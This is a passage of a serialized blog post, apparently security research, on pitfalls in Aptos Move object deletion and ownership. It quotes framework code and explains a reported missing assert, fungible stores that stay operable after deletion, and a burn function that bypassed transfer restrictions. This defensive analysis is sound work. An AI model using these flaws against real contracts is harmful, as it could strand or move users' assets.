error::invalid_argument(EOBJECT_IS_DELETABLE));\n",[66856],{"type":25,"tag":82,"props":66857,"children":66858},{"__ignoreMap":7},[66859],{"type":25,"tag":216,"props":66860,"children":66861},{"class":6922,"line":6923},[66862,66866,66870,66874,66879,66883,66888,66892,66897,66902,66906,66910],{"type":25,"tag":216,"props":66863,"children":66864},{"style":7047},[66865],{"type":31,"value":45949},{"type":25,"tag":216,"props":66867,"children":66868},{"style":6964},[66869],{"type":31,"value":1850},{"type":25,"tag":216,"props":66871,"children":66872},{"style":6953},[66873],{"type":31,"value":24581},{"type":25,"tag":216,"props":66875,"children":66876},{"style":6964},[66877],{"type":31,"value":66878},"object",{"type":25,"tag":216,"props":66880,"children":66881},{"style":6953},[66882],{"type":31,"value":7438},{"type":25,"tag":216,"props":66884,"children":66885},{"style":7047},[66886],{"type":31,"value":66887},"can_generate_delete_ref",{"type":25,"tag":216,"props":66889,"children":66890},{"style":6964},[66891],{"type":31,"value":1850},{"type":25,"tag":216,"props":66893,"children":66894},{"style":6947},[66895],{"type":31,"value":66896},"constructor_ref",{"type":25,"tag":216,"props":66898,"children":66899},{"style":6964},[66900],{"type":31,"value":66901},"), error",{"type":25,"tag":216,"props":66903,"children":66904},{"style":6953},[66905],{"type":31,"value":7438},{"type":25,"tag":216,"props":66907,"children":66908},{"style":7047},[66909],{"type":31,"value":66342},{"type":25,"tag":216,"props":66911,"children":66912},{"style":6964},[66913],{"type":31,"value":66914},"(EOBJECT_IS_DELETABLE));\n",{"type":25,"tag":38,"props":66916,"children":66917},{},[66918,66920,66925,66927,66932,66933,66940],{"type":31,"value":66919},"This object serves as the foundation for ownership tokens in the form of a ",{"type":25,"tag":82,"props":66921,"children":66923},{"className":66922},[],[66924],{"type":31,"value":65479},{"type":31,"value":66926},". This means that allowing it to be deletable wouldn't make sense and would impact the usability of such fungible assets, restricting users from accessing critical functionalities such as creating new stores. In the past the ",{"type":25,"tag":82,"props":66928,"children":66930},{"className":66929},[],[66931],{"type":31,"value":66850},{"type":31,"value":10409},{"type":25,"tag":162,"props":66934,"children":66937},{"href":66935,"rel":66936},"https://github.com/aptos-labs/aptos-core/commit/6976f8e9004b0f6ebb6fd976410d695c5a5a7ace",[166],[66938],{"type":31,"value":66939},"lacked this assert",{"type":31,"value":66941},", which we discovered and reported.",{"type":25,"tag":38,"props":66943,"children":66944},{},[66945,66950,66952,66957,66959,66964],{"type":25,"tag":82,"props":66946,"children":66948},{"className":66947},[],[66949],{"type":31,"value":66850},{"type":31,"value":66951}," transfers the ",{"type":25,"tag":82,"props":66953,"children":66955},{"className":66954},[],[66956],{"type":31,"value":65538},{"type":31,"value":66958}," and associated resources to this new object. After that, with the appropriate permissions, the ",{"type":25,"tag":82,"props":66960,"children":66962},{"className":66961},[],[66963],{"type":31,"value":65479},{"type":31,"value":66965}," can be minted, representing a share of ownership in that object.",{"type":25,"tag":206,"props":66967,"children":66969},{"className":6915,"code":66968,"language":6914,"meta":7,"style":7},"/// Make an existing object fungible by adding the Metadata resource.\npublic fun add_fungibility(\n    [...]\n): Object\u003CMetadata> {\n    [...]\n    move_to(metadata_object_signer,\n        Metadata {\n            name,\n            symbol,\n            decimals,\n            icon_uri,\n            project_uri,\n        }\n    );\n[...]\n}\n",[66970],{"type":25,"tag":82,"props":66971,"children":66972},{"__ignoreMap":7},[66973,66981,67001,67016,67043,67058,67079,67091,67103,67115,67127,67139,67151,67158,67165,67180],{"type":25,"tag":216,"props":66974,"children":66975},{"class":6922,"line":6923},[66976],{"type":25,"tag":216,"props":66977,"children":66978},{"style":6927},[66979],{"type":31,"value":66980},"/// Make an existing object fungible by adding the Metadata resource.\n",{"type":25,"tag":216,"props":66982,"children":66983},{"class":6922,"line":6769},[66984,66988,66992,66997],{"type":25,"tag":216,"props":66985,"children":66986},{"style":6947},[66987],{"type":31,"value":65643},{"type":25,"tag":216,"props":66989,"children":66990},{"style":6947},[66991],{"type":31,"value":10158},{"type":25,"tag":216,"props":66993,"children":66994},{"style":7047},[66995],{"type":31,"value":66996}," add_fungibility",{"type":25,"tag":216,"props":66998,"children":66999},{"style":6964},[67000],{"type":31,"value":7420},{"type":25,"tag":216,"props":67002,"children":67003},{"class":6922,"line":6778},[67004,67008,67012],{"type":25,"tag":216,"props":67005,"children":67006},{"style":6964},[67007],{"type":31,"value":66686},{"type":25,"tag":216,"props":67009,"children":67010},{"style":6953},[67011],{"type":31,"value":13547},{"type":25,"tag":216,"props":67013,"children":67014},{"style":6964},[67015],{"type":31,"value":15728},{"type":25,"tag":216,"props":67017,"children":67018},{"class":6922,"line":7005},[67019,67023,67027,67031,67035,67039],{"type":25,"tag":216,"props":67020,"children":67021},{"style":6964},[67022],{"type":31,"value":1888},{"type":25,"tag":216,"props":67024,"children":67025},{"style":6953},[67026],{"type":31,"value":1472},{"type":25,"tag":216,"props":67028,"children":67029},{"style":7375},[67030],{"type":31,"value":65529},{"type":25,"tag":216,"props":67032,"children":67033},{"style":6964},[67034],{"type":31,"value":9757},{"type":25,"tag":216,"props":67036,"children":67037},{"style":7375},[67038],{"type":31,"value":65538},{"type":25,"tag":216,"props":67040,"children":67041},{"style":6964},[67042],{"type":31,"value":11233},{"type":25,"tag":216,"props":67044,"children":67045},{"class":6922,"line":7110},[67046,67050,67054],{"type":25,"tag":216,"props":67047,"children":67048},{"style":6964},[67049],{"type":31,"value":66686},{"type":25,"tag":216,"props":67051,"children":67052},{"style":6953},[67053],{"type":31,"value":13547},{"type":25,"tag":216,"props":67055,"children":67056},{"style":6964},[67057],{"type":31,"value":15728},{"type":25,"tag":216,"props":67059,"children":67060},{"class":6922,"line":7216},[67061,67066,67070,67075],{"type":25,"tag":216,"props":67062,"children":67063},{"style":7047},[67064],{"type":31,"value":67065},"    move_to",{"type":25,"tag":216,"props":67067,"children":67068},{"style":6964},[67069],{"type":31,"value":1850},{"type":25,"tag":216,"props":67071,"children":67072},{"style":6947},[67073],{"type":31,"value":67074},"metadata_object_signer",{"type":25,"tag":216,"props":67076,"children":67077},{"style":6964},[67078],{"type":31,"value":7465},{"type":25,"tag":216,"props":67080,"children":67081},{"class":6922,"line":7244},[67082,67087],{"type":25,"tag":216,"props":67083,"children":67084},{"style":7375},[67085],{"type":31,"value":67086},"        Metadata",{"type":25,"tag":216,"props":67088,"children":67089},{"style":6964},[67090],{"type":31,"value":7241},{"type":25,"tag":216,"props":67092,"children":67093},{"class":6922,"line":7257},[67094,67099],{"type":25,"tag":216,"props":67095,"children":67096},{"style":6947},[67097],{"type":31,"value":67098},"            name",{"type":25,"tag":216,"props":67100,"children":67101},{"style":6964},[67102],{"type":31,"value":7465},{"type":25,"tag":216,"props":67104,"children":67105},{"class":6922,"line":7275},[67106,67111],{"type":25,"tag":216,"props":67107,"children":67108},{"style":6947},[67109],{"type":31,"value":67110},"            symbol",{"type":25,"tag":216,"props":67112,"children":67113},{"style":6964},[67114],{"type":31,"value":7465},{"type":25,"tag":216,"props":67116,"children":67117},{"class":6922,"line":7296},[67118,67123],{"type":25,"tag":216,"props":67119,"children":67120},{"style":6947},[67121],{"type":31,"value":67122},"            decimals",{"type":25,"tag":216,"props":67124,"children":67125},{"style":6964},[67126],{"type":31,"value":7465},{"type":25,"tag":216,"props":67128,"children":67129},{"class":6922,"line":7305},[67130,67135],{"type":25,"tag":216,"props":67131,"children":67132},{"style":6947},[67133],{"type":31,"value":67134},"            icon_uri",{"type":25,"tag":216,"props":67136,"children":67137},{"style":6964},[67138],{"type":31,"value":7465},{"type":25,"tag":216,"props":67140,"children":67141},{"class":6922,"line":7557},[67142,67147],{"type":25,"tag":216,"props":67143,"children":67144},{"style":6947},[67145],{"type":31,"value":67146},"            project_uri",{"type":25,"tag":216,"props":67148,"children":67149},{"style":6964},[67150],{"type":31,"value":7465},{"type":25,"tag":216,"props":67152,"children":67153},{"class":6922,"line":7574},[67154],{"type":25,"tag":216,"props":67155,"children":67156},{"style":6964},[67157],{"type":31,"value":7302},{"type":25,"tag":216,"props":67159,"children":67160},{"class":6922,"line":7591},[67161],{"type":25,"tag":216,"props":67162,"children":67163},{"style":6964},[67164],{"type":31,"value":47623},{"type":25,"tag":216,"props":67166,"children":67167},{"class":6922,"line":7604},[67168,67172,67176],{"type":25,"tag":216,"props":67169,"children":67170},{"style":6964},[67171],{"type":31,"value":7701},{"type":25,"tag":216,"props":67173,"children":67174},{"style":6953},[67175],{"type":31,"value":13547},{"type":25,"tag":216,"props":67177,"children":67178},{"style":6964},[67179],{"type":31,"value":15728},{"type":25,"tag":216,"props":67181,"children":67182},{"class":6922,"line":7613},[67183],{"type":25,"tag":216,"props":67184,"children":67185},{"style":6964},[67186],{"type":31,"value":7874},{"type":25,"tag":22753,"props":67188,"children":67189},{},[],{"type":25,"tag":38,"props":67191,"children":67192},{},[67193,67195,67200,67202,67207],{"type":31,"value":67194},"Deletions can be a big issue even when dealing with objects that are eligible for deletion. For example, a ",{"type":25,"tag":82,"props":67196,"children":67198},{"className":67197},[],[67199],{"type":31,"value":66044},{"type":31,"value":67201}," is also an object, and a \"secondary\" ",{"type":25,"tag":82,"props":67203,"children":67205},{"className":67204},[],[67206],{"type":31,"value":66044},{"type":31,"value":67208}," can be created as deletable if empty. The catch is that deletion can occur both at the fungible asset level and at the object level.",{"type":25,"tag":206,"props":67210,"children":67212},{"className":6915,"code":67211,"language":6914,"meta":7,"style":7},"//Fungible asset\npublic fun remove_store(delete_ref: &DeleteRef)\n\n//Object\npublic fun delete(ref: DeleteRef)\n",[67213],{"type":25,"tag":82,"props":67214,"children":67215},{"__ignoreMap":7},[67216,67224,67266,67273,67281],{"type":25,"tag":216,"props":67217,"children":67218},{"class":6922,"line":6923},[67219],{"type":25,"tag":216,"props":67220,"children":67221},{"style":6927},[67222],{"type":31,"value":67223},"//Fungible asset\n",{"type":25,"tag":216,"props":67225,"children":67226},{"class":6922,"line":6769},[67227,67231,67235,67240,67244,67249,67253,67257,67262],{"type":25,"tag":216,"props":67228,"children":67229},{"style":6947},[67230],{"type":31,"value":65643},{"type":25,"tag":216,"props":67232,"children":67233},{"style":6947},[67234],{"type":31,"value":10158},{"type":25,"tag":216,"props":67236,"children":67237},{"style":7047},[67238],{"type":31,"value":67239}," remove_store",{"type":25,"tag":216,"props":67241,"children":67242},{"style":6964},[67243],{"type":31,"value":1850},{"type":25,"tag":216,"props":67245,"children":67246},{"style":6947},[67247],{"type":31,"value":67248},"delete_ref",{"type":25,"tag":216,"props":67250,"children":67251},{"style":6953},[67252],{"type":31,"value":1472},{"type":25,"tag":216,"props":67254,"children":67255},{"style":6953},[67256],{"type":31,"value":11093},{"type":25,"tag":216,"props":67258,"children":67259},{"style":7375},[67260],{"type":31,"value":67261},"DeleteRef",{"type":25,"tag":216,"props":67263,"children":67264},{"style":6964},[67265],{"type":31,"value":7107},{"type":25,"tag":216,"props":67267,"children":67268},{"class":6922,"line":6778},[67269],{"type":25,"tag":216,"props":67270,"children":67271},{"emptyLinePlaceholder":16},[67272],{"type":31,"value":7642},{"type":25,"tag":216,"props":67274,"children":67275},{"class":6922,"line":7005},[67276],{"type":25,"tag":216,"props":67277,"children":67278},{"style":6927},[67279],{"type":31,"value":67280},"//Object\n",{"type":25,"tag":216,"props":67282,"children":67283},{"class":6922,"line":7110},[67284,67288,67292,67297,67301,67306,67310,67315],{"type":25,"tag":216,"props":67285,"children":67286},{"style":6947},[67287],{"type":31,"value":65643},{"type":25,"tag":216,"props":67289,"children":67290},{"style":6947},[67291],{"type":31,"value":10158},{"type":25,"tag":216,"props":67293,"children":67294},{"style":7047},[67295],{"type":31,"value":67296}," delete",{"type":25,"tag":216,"props":67298,"children":67299},{"style":6964},[67300],{"type":31,"value":1850},{"type":25,"tag":216,"props":67302,"children":67303},{"style":6936},[67304],{"type":31,"value":67305},"ref",{"type":25,"tag":216,"props":67307,"children":67308},{"style":6953},[67309],{"type":31,"value":1472},{"type":25,"tag":216,"props":67311,"children":67312},{"style":7375},[67313],{"type":31,"value":67314}," DeleteRef",{"type":25,"tag":216,"props":67316,"children":67317},{"style":6964},[67318],{"type":31,"value":7107},{"type":25,"tag":38,"props":67320,"children":67321},{},[67322,67324,67330,67332,67337,67339,67344,67346,67351,67353,67359,67361,67367,67369,67374],{"type":31,"value":67323},"When ",{"type":25,"tag":82,"props":67325,"children":67327},{"className":67326},[],[67328],{"type":31,"value":67329},"object::delete",{"type":31,"value":67331}," removes the ",{"type":25,"tag":82,"props":67333,"children":67335},{"className":67334},[],[67336],{"type":31,"value":52820},{"type":31,"value":67338}," from a ",{"type":25,"tag":82,"props":67340,"children":67342},{"className":67341},[],[67343],{"type":31,"value":66044},{"type":31,"value":67345}," object, the ",{"type":25,"tag":82,"props":67347,"children":67349},{"className":67348},[],[67350],{"type":31,"value":66044},{"type":31,"value":67352}," resource becomes permanently undeletable. This is because ",{"type":25,"tag":82,"props":67354,"children":67356},{"className":67355},[],[67357],{"type":31,"value":67358},"remove_store",{"type":31,"value":67360}," can't create an ",{"type":25,"tag":82,"props":67362,"children":67364},{"className":67363},[],[67365],{"type":31,"value":67366},"Object\u003CFungibleStore>",{"type":31,"value":67368}," without an ",{"type":25,"tag":82,"props":67370,"children":67372},{"className":67371},[],[67373],{"type":31,"value":52820},{"type":31,"value":67375}," underneath, causing the operation to fail.",{"type":25,"tag":206,"props":67377,"children":67379},{"className":6915,"code":67378,"language":6914,"meta":7,"style":7},"public fun remove_store(delete_ref: &DeleteRef) acquires [...] {\n    let store = &object::object_from_delete_ref\u003CFungibleStore>(delete_ref);\n    [...]\n}\n",[67380],{"type":25,"tag":82,"props":67381,"children":67382},{"__ignoreMap":7},[67383,67438,67490,67505],{"type":25,"tag":216,"props":67384,"children":67385},{"class":6922,"line":6923},[67386,67390,67394,67398,67402,67406,67410,67414,67418,67422,67426,67430,67434],{"type":25,"tag":216,"props":67387,"children":67388},{"style":6947},[67389],{"type":31,"value":65643},{"type":25,"tag":216,"props":67391,"children":67392},{"style":6947},[67393],{"type":31,"value":10158},{"type":25,"tag":216,"props":67395,"children":67396},{"style":7047},[67397],{"type":31,"value":67239},{"type":25,"tag":216,"props":67399,"children":67400},{"style":6964},[67401],{"type":31,"value":1850},{"type":25,"tag":216,"props":67403,"children":67404},{"style":6947},[67405],{"type":31,"value":67248},{"type":25,"tag":216,"props":67407,"children":67408},{"style":6953},[67409],{"type":31,"value":1472},{"type":25,"tag":216,"props":67411,"children":67412},{"style":6953},[67413],{"type":31,"value":11093},{"type":25,"tag":216,"props":67415,"children":67416},{"style":7375},[67417],{"type":31,"value":67261},{"type":25,"tag":216,"props":67419,"children":67420},{"style":6964},[67421],{"type":31,"value":7036},{"type":25,"tag":216,"props":67423,"children":67424},{"style":6947},[67425],{"type":31,"value":10295},{"type":25,"tag":216,"props":67427,"children":67428},{"style":6964},[67429],{"type":31,"value":26978},{"type":25,"tag":216,"props":67431,"children":67432},{"style":6953},[67433],{"type":31,"value":13547},{"type":25,"tag":216,"props":67435,"children":67436},{"style":6964},[67437],{"type":31,"value":65734},{"type":25,"tag":216,"props":67439,"children":67440},{"class":6922,"line":6769},[67441,67445,67449,67453,67457,67461,67465,67470,67474,67478,67482,67486],{"type":25,"tag":216,"props":67442,"children":67443},{"style":6936},[67444],{"type":31,"value":6939},{"type":25,"tag":216,"props":67446,"children":67447},{"style":6947},[67448],{"type":31,"value":9782},{"type":25,"tag":216,"props":67450,"children":67451},{"style":6953},[67452],{"type":31,"value":6956},{"type":25,"tag":216,"props":67454,"children":67455},{"style":6953},[67456],{"type":31,"value":11093},{"type":25,"tag":216,"props":67458,"children":67459},{"style":6964},[67460],{"type":31,"value":66878},{"type":25,"tag":216,"props":67462,"children":67463},{"style":6953},[67464],{"type":31,"value":7438},{"type":25,"tag":216,"props":67466,"children":67467},{"style":6947},[67468],{"type":31,"value":67469},"object_from_delete_ref",{"type":25,"tag":216,"props":67471,"children":67472},{"style":6964},[67473],{"type":31,"value":9757},{"type":25,"tag":216,"props":67475,"children":67476},{"style":7375},[67477],{"type":31,"value":66044},{"type":25,"tag":216,"props":67479,"children":67480},{"style":6964},[67481],{"type":31,"value":11562},{"type":25,"tag":216,"props":67483,"children":67484},{"style":6947},[67485],{"type":31,"value":67248},{"type":25,"tag":216,"props":67487,"children":67488},{"style":6964},[67489],{"type":31,"value":7797},{"type":25,"tag":216,"props":67491,"children":67492},{"class":6922,"line":6778},[67493,67497,67501],{"type":25,"tag":216,"props":67494,"children":67495},{"style":6964},[67496],{"type":31,"value":66686},{"type":25,"tag":216,"props":67498,"children":67499},{"style":6953},[67500],{"type":31,"value":13547},{"type":25,"tag":216,"props":67502,"children":67503},{"style":6964},[67504],{"type":31,"value":15728},{"type":25,"tag":216,"props":67506,"children":67507},{"class":6922,"line":7005},[67508],{"type":25,"tag":216,"props":67509,"children":67510},{"style":6964},[67511],{"type":31,"value":7874},{"type":25,"tag":38,"props":67513,"children":67514},{},[67515,67517,67522,67524,67530,67532,67537],{"type":31,"value":67516},"In addition, such \"deleted\" ",{"type":25,"tag":82,"props":67518,"children":67520},{"className":67519},[],[67521],{"type":31,"value":66044},{"type":31,"value":67523}," objects remain at least partially operable. For instance, ",{"type":25,"tag":82,"props":67525,"children":67527},{"className":67526},[],[67528],{"type":31,"value":67529},"fungible_asset::deposit",{"type":31,"value":67531}," does not check the ",{"type":25,"tag":82,"props":67533,"children":67535},{"className":67534},[],[67536],{"type":31,"value":52820},{"type":31,"value":67538}," existence.",{"type":25,"tag":606,"props":67540,"children":67542},{"id":67541},"ownership",[67543],{"type":31,"value":67544},"Ownership",{"type":25,"tag":38,"props":67546,"children":67547},{},[67548,67550,67555,67557,67563,67565,67570],{"type":31,"value":67549},"Each object has an owner. Fungible assets rely on the ",{"type":25,"tag":82,"props":67551,"children":67553},{"className":67552},[],[67554],{"type":31,"value":52820},{"type":31,"value":67556}," ownership model. For example, during a withdrawal operation, the signer is validated using ",{"type":25,"tag":82,"props":67558,"children":67560},{"className":67559},[],[67561],{"type":31,"value":67562},"object::owns",{"type":31,"value":67564}," to confirm ownership of the ",{"type":25,"tag":82,"props":67566,"children":67568},{"className":67567},[],[67569],{"type":31,"value":66044},{"type":31,"value":54145},{"type":25,"tag":206,"props":67572,"children":67574},{"className":6915,"code":67573,"language":6914,"meta":7,"style":7},"public(friend) fun withdraw_sanity_check\u003CT: key>(\n    owner: &signer,\n    store: Object\u003CT>,\n    abort_on_dispatch: bool,\n) acquires FungibleStore, DispatchFunctionStore {\n    assert!(object::owns(store, signer::address_of(owner)), error::permission_denied(ENOT_STORE_OWNER));\n    [...]\n}\n",[67575],{"type":25,"tag":82,"props":67576,"children":67577},{"__ignoreMap":7},[67578,67626,67650,67677,67697,67725,67793,67808],{"type":25,"tag":216,"props":67579,"children":67580},{"class":6922,"line":6923},[67581,67585,67589,67593,67597,67601,67606,67610,67614,67618,67622],{"type":25,"tag":216,"props":67582,"children":67583},{"style":7047},[67584],{"type":31,"value":65643},{"type":25,"tag":216,"props":67586,"children":67587},{"style":6964},[67588],{"type":31,"value":1850},{"type":25,"tag":216,"props":67590,"children":67591},{"style":6947},[67592],{"type":31,"value":11050},{"type":25,"tag":216,"props":67594,"children":67595},{"style":6964},[67596],{"type":31,"value":7036},{"type":25,"tag":216,"props":67598,"children":67599},{"style":6947},[67600],{"type":31,"value":11059},{"type":25,"tag":216,"props":67602,"children":67603},{"style":6947},[67604],{"type":31,"value":67605}," withdraw_sanity_check",{"type":25,"tag":216,"props":67607,"children":67608},{"style":6964},[67609],{"type":31,"value":9757},{"type":25,"tag":216,"props":67611,"children":67612},{"style":7375},[67613],{"type":31,"value":177},{"type":25,"tag":216,"props":67615,"children":67616},{"style":6953},[67617],{"type":31,"value":1472},{"type":25,"tag":216,"props":67619,"children":67620},{"style":6947},[67621],{"type":31,"value":9883},{"type":25,"tag":216,"props":67623,"children":67624},{"style":6964},[67625],{"type":31,"value":10540},{"type":25,"tag":216,"props":67627,"children":67628},{"class":6922,"line":6769},[67629,67634,67638,67642,67646],{"type":25,"tag":216,"props":67630,"children":67631},{"style":6947},[67632],{"type":31,"value":67633},"    owner",{"type":25,"tag":216,"props":67635,"children":67636},{"style":6953},[67637],{"type":31,"value":1472},{"type":25,"tag":216,"props":67639,"children":67640},{"style":6953},[67641],{"type":31,"value":11093},{"type":25,"tag":216,"props":67643,"children":67644},{"style":6947},[67645],{"type":31,"value":11098},{"type":25,"tag":216,"props":67647,"children":67648},{"style":6964},[67649],{"type":31,"value":7465},{"type":25,"tag":216,"props":67651,"children":67652},{"class":6922,"line":6778},[67653,67657,67661,67665,67669,67673],{"type":25,"tag":216,"props":67654,"children":67655},{"style":6947},[67656],{"type":31,"value":33374},{"type":25,"tag":216,"props":67658,"children":67659},{"style":6953},[67660],{"type":31,"value":1472},{"type":25,"tag":216,"props":67662,"children":67663},{"style":7375},[67664],{"type":31,"value":65529},{"type":25,"tag":216,"props":67666,"children":67667},{"style":6964},[67668],{"type":31,"value":9757},{"type":25,"tag":216,"props":67670,"children":67671},{"style":7375},[67672],{"type":31,"value":177},{"type":25,"tag":216,"props":67674,"children":67675},{"style":6964},[67676],{"type":31,"value":10089},{"type":25,"tag":216,"props":67678,"children":67679},{"class":6922,"line":7005},[67680,67685,67689,67693],{"type":25,"tag":216,"props":67681,"children":67682},{"style":6947},[67683],{"type":31,"value":67684},"    abort_on_dispatch",{"type":25,"tag":216,"props":67686,"children":67687},{"style":6953},[67688],{"type":31,"value":1472},{"type":25,"tag":216,"props":67690,"children":67691},{"style":7375},[67692],{"type":31,"value":16006},{"type":25,"tag":216,"props":67694,"children":67695},{"style":6964},[67696],{"type":31,"value":7465},{"type":25,"tag":216,"props":67698,"children":67699},{"class":6922,"line":7110},[67700,67704,67708,67712,67716,67721],{"type":25,"tag":216,"props":67701,"children":67702},{"style":6964},[67703],{"type":31,"value":7036},{"type":25,"tag":216,"props":67705,"children":67706},{"style":6947},[67707],{"type":31,"value":10295},{"type":25,"tag":216,"props":67709,"children":67710},{"style":7375},[67711],{"type":31,"value":66064},{"type":25,"tag":216,"props":67713,"children":67714},{"style":6964},[67715],{"type":31,"value":7026},{"type":25,"tag":216,"props":67717,"children":67718},{"style":7375},[67719],{"type":31,"value":67720},"DispatchFunctionStore",{"type":25,"tag":216,"props":67722,"children":67723},{"style":6964},[67724],{"type":31,"value":7241},{"type":25,"tag":216,"props":67726,"children":67727},{"class":6922,"line":7216},[67728,67732,67737,67741,67746,67750,67754,67758,67762,67766,67770,67774,67779,67783,67788],{"type":25,"tag":216,"props":67729,"children":67730},{"style":7047},[67731],{"type":31,"value":66312},{"type":25,"tag":216,"props":67733,"children":67734},{"style":6964},[67735],{"type":31,"value":67736},"(object",{"type":25,"tag":216,"props":67738,"children":67739},{"style":6953},[67740],{"type":31,"value":7438},{"type":25,"tag":216,"props":67742,"children":67743},{"style":7047},[67744],{"type":31,"value":67745},"owns",{"type":25,"tag":216,"props":67747,"children":67748},{"style":6964},[67749],{"type":31,"value":1850},{"type":25,"tag":216,"props":67751,"children":67752},{"style":6947},[67753],{"type":31,"value":9892},{"type":25,"tag":216,"props":67755,"children":67756},{"style":6964},[67757],{"type":31,"value":16892},{"type":25,"tag":216,"props":67759,"children":67760},{"style":6953},[67761],{"type":31,"value":7438},{"type":25,"tag":216,"props":67763,"children":67764},{"style":7047},[67765],{"type":31,"value":11161},{"type":25,"tag":216,"props":67767,"children":67768},{"style":6964},[67769],{"type":31,"value":1850},{"type":25,"tag":216,"props":67771,"children":67772},{"style":6947},[67773],{"type":31,"value":19567},{"type":25,"tag":216,"props":67775,"children":67776},{"style":6964},[67777],{"type":31,"value":67778},")), error",{"type":25,"tag":216,"props":67780,"children":67781},{"style":6953},[67782],{"type":31,"value":7438},{"type":25,"tag":216,"props":67784,"children":67785},{"style":7047},[67786],{"type":31,"value":67787},"permission_denied",{"type":25,"tag":216,"props":67789,"children":67790},{"style":6964},[67791],{"type":31,"value":67792},"(ENOT_STORE_OWNER));\n",{"type":25,"tag":216,"props":67794,"children":67795},{"class":6922,"line":7244},[67796,67800,67804],{"type":25,"tag":216,"props":67797,"children":67798},{"style":6964},[67799],{"type":31,"value":66686},{"type":25,"tag":216,"props":67801,"children":67802},{"style":6953},[67803],{"type":31,"value":13547},{"type":25,"tag":216,"props":67805,"children":67806},{"style":6964},[67807],{"type":31,"value":15728},{"type":25,"tag":216,"props":67809,"children":67810},{"class":6922,"line":7257},[67811],{"type":25,"tag":216,"props":67812,"children":67813},{"style":6964},[67814],{"type":31,"value":7874},{"type":25,"tag":38,"props":67816,"children":67817},{},[67818,67820,67825,67827,67833,67835,67841],{"type":31,"value":67819},"The thing to note is that defining ownership with ",{"type":25,"tag":82,"props":67821,"children":67823},{"className":67822},[],[67824],{"type":31,"value":67562},{"type":31,"value":67826}," can be tricky. The ",{"type":25,"tag":82,"props":67828,"children":67830},{"className":67829},[],[67831],{"type":31,"value":67832},"burn",{"type":31,"value":67834}," function was one of the reasons behind that. It allowed changing the object's owner to the ",{"type":25,"tag":82,"props":67836,"children":67838},{"className":67837},[],[67839],{"type":31,"value":67840},"BURN_ADDRESS",{"type":31,"value":67842}," while bypassing transfer restrictions:",{"type":25,"tag":206,"props":67844,"children":67846},{"className":6915,"code":67845,"language":6914,"meta":7,"style":7},"public entry fun burn\u003CT: key>(owner: &signer, object: Object\u003CT>) acquires ObjectCore {\n    let original_owner = signer::address_of(owner);\n    assert!(is_owner(object, original_owner), error::permission_denied(ENOT_OBJECT_OWNER));\n    let object_addr = object.inner;\n    move_to(&create_signer(object_addr), TombStone { original_owner });\n    transfer_raw_inner(object_addr, BURN_ADDRESS);\n}\n",[67847],{"type":25,"tag":82,"props":67848,"children":67849},{"__ignoreMap":7},[67850,67947,67988,68038,68067,68117,68138],{"type":25,"tag":216,"props":67851,"children":67852},{"class":6922,"line":6923},[67853,67857,67861,67865,67870,67874,67878,67882,67886,67890,67894,67898,67902,67906,67910,67914,67918,67922,67926,67930,67934,67938,67943],{"type":25,"tag":216,"props":67854,"children":67855},{"style":6947},[67856],{"type":31,"value":65643},{"type":25,"tag":216,"props":67858,"children":67859},{"style":6947},[67860],{"type":31,"value":66610},{"type":25,"tag":216,"props":67862,"children":67863},{"style":6947},[67864],{"type":31,"value":10158},{"type":25,"tag":216,"props":67866,"children":67867},{"style":6947},[67868],{"type":31,"value":67869}," burn",{"type":25,"tag":216,"props":67871,"children":67872},{"style":6964},[67873],{"type":31,"value":9757},{"type":25,"tag":216,"props":67875,"children":67876},{"style":7375},[67877],{"type":31,"value":177},{"type":25,"tag":216,"props":67879,"children":67880},{"style":6953},[67881],{"type":31,"value":1472},{"type":25,"tag":216,"props":67883,"children":67884},{"style":6947},[67885],{"type":31,"value":9883},{"type":25,"tag":216,"props":67887,"children":67888},{"style":6964},[67889],{"type":31,"value":11562},{"type":25,"tag":216,"props":67891,"children":67892},{"style":6947},[67893],{"type":31,"value":19567},{"type":25,"tag":216,"props":67895,"children":67896},{"style":6953},[67897],{"type":31,"value":1472},{"type":25,"tag":216,"props":67899,"children":67900},{"style":6953},[67901],{"type":31,"value":11093},{"type":25,"tag":216,"props":67903,"children":67904},{"style":6947},[67905],{"type":31,"value":11098},{"type":25,"tag":216,"props":67907,"children":67908},{"style":6964},[67909],{"type":31,"value":7026},{"type":25,"tag":216,"props":67911,"children":67912},{"style":6947},[67913],{"type":31,"value":66878},{"type":25,"tag":216,"props":67915,"children":67916},{"style":6953},[67917],{"type":31,"value":1472},{"type":25,"tag":216,"props":67919,"children":67920},{"style":7375},[67921],{"type":31,"value":65529},{"type":25,"tag":216,"props":67923,"children":67924},{"style":6964},[67925],{"type":31,"value":9757},{"type":25,"tag":216,"props":67927,"children":67928},{"style":7375},[67929],{"type":31,"value":177},{"type":25,"tag":216,"props":67931,"children":67932},{"style":6964},[67933],{"type":31,"value":24406},{"type":25,"tag":216,"props":67935,"children":67936},{"style":6947},[67937],{"type":31,"value":10295},{"type":25,"tag":216,"props":67939,"children":67940},{"style":7375},[67941],{"type":31,"value":67942}," ObjectCore",{"type":25,"tag":216,"props":67944,"children":67945},{"style":6964},[67946],{"type":31,"value":7241},{"type":25,"tag":216,"props":67948,"children":67949},{"class":6922,"line":6769},[67950,67954,67959,67963,67968,67972,67976,67980,67984],{"type":25,"tag":216,"props":67951,"children":67952},{"style":6936},[67953],{"type":31,"value":6939},{"type":25,"tag":216,"props":67955,"children":67956},{"style":6947},[67957],{"type":31,"value":67958}," original_owner",{"type":25,"tag":216,"props":67960,"children":67961},{"style":6953},[67962],{"type":31,"value":6956},{"type":25,"tag":216,"props":67964,"children":67965},{"style":6964},[67966],{"type":31,"value":67967}," signer",{"type":25,"tag":216,"props":67969,"children":67970},{"style":6953},[67971],{"type":31,"value":7438},{"type":25,"tag":216,"props":67973,"children":67974},{"style":7047},[67975],{"type":31,"value":11161},{"type":25,"tag":216,"props":67977,"children":67978},{"style":6964},[67979],{"type":31,"value":1850},{"type":25,"tag":216,"props":67981,"children":67982},{"style":6947},[67983],{"type":31,"value":19567},{"type":25,"tag":216,"props":67985,"children":67986},{"style":6964},[67987],{"type":31,"value":7797},{"type":25,"tag":216,"props":67989,"children":67990},{"class":6922,"line":6778},[67991,67995,67999,68004,68008,68012,68016,68021,68025,68029,68033],{"type":25,"tag":216,"props":67992,"children":67993},{"style":7047},[67994],{"type":31,"value":66312},{"type":25,"tag":216,"props":67996,"children":67997},{"style":6964},[67998],{"type":31,"value":1850},{"type":25,"tag":216,"props":68000,"children":68001},{"style":7047},[68002],{"type":31,"value":68003},"is_owner",{"type":25,"tag":216,"props":68005,"children":68006},{"style":6964},[68007],{"type":31,"value":1850},{"type":25,"tag":216,"props":68009,"children":68010},{"style":6947},[68011],